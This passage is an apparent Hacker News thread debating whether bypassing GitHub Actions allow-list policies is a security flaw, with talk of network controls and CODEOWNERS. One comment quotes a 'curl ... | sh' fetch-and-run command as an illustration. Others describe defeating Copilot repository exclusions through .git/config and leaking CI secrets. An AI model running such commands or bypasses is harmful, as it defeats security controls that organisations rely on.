Or in other words: the point here is similar to the reason companies run their own private NPM, PyPI, etc. indices -- the point is not to stop the junior engineers from inserting shoddy dependencies, but to know when they do so that remediation becomes a matter of policy, not "find everywhere we depend on this component." Bypassing that policy means that the worst of both worlds happens: you have the shoddy dependency and the policy-view of the world doesn't believe you do.

[1]: https://docs.github.com/en/repositories/managing-your-reposi...

qbane 2 days ago
Also, you can leak any secrets by making connections to external services over the internet and simply sending the secrets to them.
mystifyingpoi 1 day ago
You can also print them to console in quadruple base64 in reverse, the trick is getting away with it.
formerly_proven 1 day ago
Not in many enterprisey CI systems you can't, those frequently have hermetic build environments.
msgodel 1 day ago
Nothing makes me want to quit software more than enterprisey CI systems.
qbane 1 day ago
I think GitHub is correct that the bypass itself is not a vulnerability, but just like the little tooltip on GitHub's "create secret gist" button, GitHub can do a better job of clarifying this in the "Actions permissions" section.
john-h-k 1 day ago
There is no meaningful way to get around this. Ban them in `uses:` keys? Fine, they just put it in a bash script and run that. Etc etc. If it allows running arbitrary code, this will always exist
akoboldfrying 1 day ago
I agree that their proposed "fix" is not a fix at all, due to the fact that you can run arbitrary shell commands that achieve the same thing.

OTOH, if in addition to restricting to a whitelist of actions you completely forbid ad hoc shell commands (i.e., `run:` blocks), now you have something that can be made secure.

0xbadcafebee 1 day ago
You call it a security issue. I call it my only recourse when the god damn tyrannical GitHub Org admins lock it down so hard I can't do my job.

(yes it is a security issue (as it defeats a security policy) but I hope it remains unfixed because it's a stupid policy)

chelmzy 1 day ago
Does anyone know how to query what actions have been imported from the Actions Marketplace (or anywhere) in Github enterprise? I've been lazily looking into this for a bit and can't find a straight answer.
jamesblonde 1 day ago
Run data integration pipelines with Github actions -

https://dlthub.com/docs/walkthroughs/deploy-a-pipeline/deplo...

It's the easiest way for many startups to get people to try out your software for free.

solatic 1 day ago
If your security folk are trying to draw up a wall around the enterprise (prevent using stuff not intentionally mirrored in) but there are no network controls - no IP-address-based firewalls, no DNS firewalls, no Layer 7 firewalls (like AWS VPC Endpoint Policy or GCP VPC Service Controls) governing access to object storage and the like - then quite frankly, the implementation is either immature or incompetent.

If you work for an org with restrictive policy but not restrictive network controls, anyone at work could stand up a $5 VPS and break the network control. Or a Raspberry Pi at home and DynDNS. Or a million others.

Don't be stupid and think that a single security control means you don't need to do defense in depth.

bluelightning2k 1 day ago
I don't think this is a security flaw.

That's like saying it's a security flaw in the Chrome store that you could enable dev mode, copy the malware and run it that way.

woodruffw 22 hours ago
I think the closer analogy would be a org-managed Chrome policy preventing people from installing certain extensions, which could then be bypassed by sideloading those extensions.
zingababba 1 day ago
Copilot repository exclusions is another funny control from GitHub. It gets the local repo context from the .git/config remote origin URL. Just comment that out and you can use copilot on an 'excluded' repo. Remove the comment to push your changes. Very much a paper control.
lmm 2 days ago
Meh. Arbitrary code execution allows you to execute arbitrary code. If you curl | sh something in your github action script then that will "bypass the policy" too.
MadVikingGod 2 days ago
[flagged]
woodruffw 2 days ago
The action in question is not in the repository; it's retrieved at runner execution time. I think that's an important distinction.
lixtra 1 day ago
It’s like putting

curl -sSL https://example.com/install.sh | sh

In your action. For sure happens.

woodruffw 1 day ago
Yes; I would also consider that a bad idea. Two wrongs don't make a right (and a different wrong doesn't justify a broken policy elsewhere).
masklinn 1 day ago
Being able to filter or disable network access (aside from what github requires on their side to interact with actions) would definitely be useful, but AFAIK that's only an option for self-hosted runners and enterprise accounts.
woodruffw 1 day ago
Yep, I agree completely. It's unfortunate that self-hosted runners are otherwise so difficult to secure, since controlled ingress/egress is otherwise an extremely strong motivation for using them.
nyc1983 1 day ago
[flagged]
woodruffw 1 day ago
Of the many things people have accused me of, being uninformed about GitHub Actions best practices is new.

(CODEOWNERS is a red herring: GitHub clearly intends for this policy mechanism to be used, and so it should be sound. Policy mechanisms should always be sound, even if there's a better or more general alternative mechanism. If GitHub intends CODEOWNERS to be that mechanism, then they should remove this one and document its replacement.)

nyc1983 1 day ago
Frankly I think your article focuses on an outdated or irrelevant setting in GitHub. So the red herring is probably backwards here. There are tons of these (don't get me started about topics and managing them for many repos), but GitHub has clearly been pushing rulesets over the past years, and combined with CODEOWNERS this is the de-facto way of granularly managing who can make changes to GA workflows.
woodruffw 1 day ago
Unlike other things that have been moved to rulesets, there's no prominent marker on these policies indicating that they're outdated or no longer considered best practice. Do you have some kind of public indication that these are discouraged in any way?

(As others have pointed out, this isn't even necessarily something that makes sense with CODEOWNERS -- the point of a dependency policy is to not trust human identities at all.)

YetAnotherNick 1 day ago
CODEOWNERS is only for the main branch AFAIK. You can run GitHub Actions on any commit.
nyc1983 1 day ago
CODEOWNERS combined with branch protection rules can require reviews for arbitrary branches matching a glob pattern.
gchamonlive 1 day ago
I'm inclined to add https://github.com/marketplace/actions/sync-to-gitlab to all my repos in github, so that I can tap into the social value of GitHub's community and the technical value of GitLab's everything else.
dijksterhuis 1 day ago
Simpler version from GitLab (no actions needed) https://docs.gitlab.com/user/project/repository/mirror/push/

I was planning to do this myself. GitLab for dev work proper. GitHub push mirror on `main` for gen-pop access (releases/user issue reporting).